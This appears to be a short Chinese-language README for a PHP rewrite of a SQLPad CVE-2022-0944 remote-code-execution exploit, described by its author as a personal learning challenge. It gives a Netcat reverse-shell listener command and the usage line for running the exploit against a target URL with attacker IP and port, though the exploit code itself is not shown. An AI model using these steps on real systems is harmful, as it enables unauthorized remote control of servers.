此 PHP 代码旨在利用 SQLPad 中与 CVE-2022-0944 相关的远程代码执行(RCE)漏洞。
其工作原理是向 SQLPad 应用程序注入恶意代码,强制其执行系统命令,从而打开一个反向 Shell——这是一种连接,可授予攻击者对存在漏洞系统的远程控制权。
sudo apt-get install php-clisudo apt-get install php-curl要捕获反向 Shell 连接,请在攻击者的机器上启动 Netcat:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>:存在漏洞的 SQLPad 的根 URL(例如:http://target.com:3000)
<attacker_ip>:攻击者用于监听反向连接的 IP 地址(与 Netcat 的 IP 相同)
<attacker_port>:攻击者监听的端口(与 Netcat 的端口相同)
原始漏洞利用逻辑基于以下仓库:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
我在此处的目标是理解该漏洞利用逻辑,并将其用另一种编程语言重写,以此作为个人挑战。
补充参考: 🔗 CVE-2022-0944 – NVD